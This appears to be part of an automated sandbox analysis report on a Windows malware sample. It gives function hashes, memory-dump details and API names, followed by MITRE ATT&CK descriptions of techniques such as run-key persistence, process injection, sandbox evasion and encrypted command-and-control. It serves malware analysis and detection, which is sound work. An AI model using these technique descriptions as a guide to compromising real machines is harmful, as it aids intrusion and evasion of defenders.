Opcode Fuzzy Hash: c9993196bc088be776cc54674a118fdaf022d4553cc0a768563112edcc0a48b6
Instruction Fuzzy Hash: DDB00275410149ABCF015FA0DD0C98E3F25BF44351B008450B91595060C635C560DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0056230A, Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000705A,00000000,00000000,00000000), ref: 005623A8

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a662dd33dd29f6f78c62d5626e6b22e38ec2dfff65a7742867d3a66d3dcac8c9
Instruction ID: a5c60265c4cda2ab8519109f6f86fe1f616e91e1e8c0d17a7aecea144d779d59
Opcode Fuzzy Hash: a662dd33dd29f6f78c62d5626e6b22e38ec2dfff65a7742867d3a66d3dcac8c9
Instruction Fuzzy Hash: 3111C230A84B01EAF724BF218C4FFA83E627F80B01F648961EE565B1E19B654D4CC597

Uniqueness

Uniqueness Score: -1.00%

Function 00562357, Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000705A,00000000,00000000,00000000), ref: 005623A8

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9ba31156075a0cd836632e4f764c6f88340093d9cc297a28c5fe1dfedd82b628
Instruction ID: 89d8c5b4da8996ab4f8ed5ac9fcd47a5877a94cfabae09fb505f11b87830b1ec
Opcode Fuzzy Hash: 9ba31156075a0cd836632e4f764c6f88340093d9cc297a28c5fe1dfedd82b628
Instruction Fuzzy Hash: DE01D630D44B01DAEB14FF358C4FB687EA17F84B01F148662EE1A4B2616B644D4DC583

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 005662DB, Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

i6(, xrefs: 005664A6

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: i6(
API String ID: 0-2492998235
Opcode ID: f36e2af77c47c3602e63e86a3b0757478c5c5cdc87dd6aa75d3e3cc42394d2c8
Instruction ID: 965c589c185ebcb94299df0d76bc67489786a42604416cd678fd17aeeab1ae09
Opcode Fuzzy Hash: f36e2af77c47c3602e63e86a3b0757478c5c5cdc87dd6aa75d3e3cc42394d2c8
Instruction Fuzzy Hash: 33E10731C04B41CBEF19EE3B89AB6547E91BB91704F1986B6CC778B269F9304816C6D3

Uniqueness

Uniqueness Score: -1.00%

Function 00560ABC, Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

+<K, xrefs: 00560ADD

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: +<K
API String ID: 0-4205434992
Opcode ID: 1f0a8bfc3bcbbcb45b994961b6106a69eb374e8f99c99c70f9bb591e8eac8e38
Instruction ID: ce3803cf5c67fd6205e024e7f7d11b5ca26e0e6a318470bc9f3e289bddf8f8c7
Opcode Fuzzy Hash: 1f0a8bfc3bcbbcb45b994961b6106a69eb374e8f99c99c70f9bb591e8eac8e38
Instruction Fuzzy Hash: 9B518A30904601A6EF346B688C5ABBF2E76BFC2324F384B1AEC96971D6C5749C85C653

Uniqueness

Uniqueness Score: -1.00%

Function 00561AD5, Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4fb5730dc46d0550f31ecde181b87fe32b789616cddbaeb33f52a11b6ccff367
Instruction ID: 2b018f72be78811664c650a877b17b1207b36a27b5bfeb10c48bbba3903354ac
Opcode Fuzzy Hash: 4fb5730dc46d0550f31ecde181b87fe32b789616cddbaeb33f52a11b6ccff367
Instruction Fuzzy Hash: 00120470740A06EFEB249F24CC95BE57BB5FF48304F248629FD9997281C774A894CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0056632D, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4a81601f3fe623d8d38aa4101214ddbcd7605073eb3412aa6dcc2abea451ac90
Instruction ID: fff3ddd08483863f91a3954d1604294d6d05dcab97932669a9eb4c988e13f700
Opcode Fuzzy Hash: 4a81601f3fe623d8d38aa4101214ddbcd7605073eb3412aa6dcc2abea451ac90
Instruction Fuzzy Hash: 3651C470904341CEDF24DF28C495B55BFA1BF66324F59C7A9D8A68F3A6C2348841C713

Uniqueness

Uniqueness Score: -1.00%

Function 005654F7, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87b9b4bdeac1f5b92e4a3332658aaad88fb31a2eab080972b101deec6699782
Instruction ID: 5c928ff7ee0d7d55a4937575b4817bd8730d211143a70847ef8d686c743fc53a
Opcode Fuzzy Hash: d87b9b4bdeac1f5b92e4a3332658aaad88fb31a2eab080972b101deec6699782
Instruction Fuzzy Hash: 20219A75C84E40C7D74AFD3F996F5147F927AD5704F1986B2DC2B87224B4140829C5C7

Uniqueness

Uniqueness Score: -1.00%

Function 00565582, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50dbf1d83f888aacf09a7033f16ef5508f52150a88d0f7697976dc831b44467b
Instruction ID: 2de3b0bdb4471ecc0f465d1337dd4581c16a9a0895fbc68fbb9e1bfe4ad8c9e8
Opcode Fuzzy Hash: 50dbf1d83f888aacf09a7033f16ef5508f52150a88d0f7697976dc831b44467b
Instruction Fuzzy Hash: BEF06D75395A42CFCB24CA08CAD8E297BA2BB65710FA14954E802CB261E330EC40CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00562FEA, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5688b366ab973114459d431c2eaac4ca0cc06224d0665b7ec2e544e8829a442
Instruction ID: cfef44cf6a6270fb4322a198fa7eb88ba29ef886b938674e8c36d6fb07f5a353
Opcode Fuzzy Hash: b5688b366ab973114459d431c2eaac4ca0cc06224d0665b7ec2e544e8829a442
Instruction Fuzzy Hash: 80C092BB2004C18FEB42DF0CC481B8073A2FF10E48BC404D0E442CB616C328ED81CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00564D4A, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 4AtUJN8Hdu.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage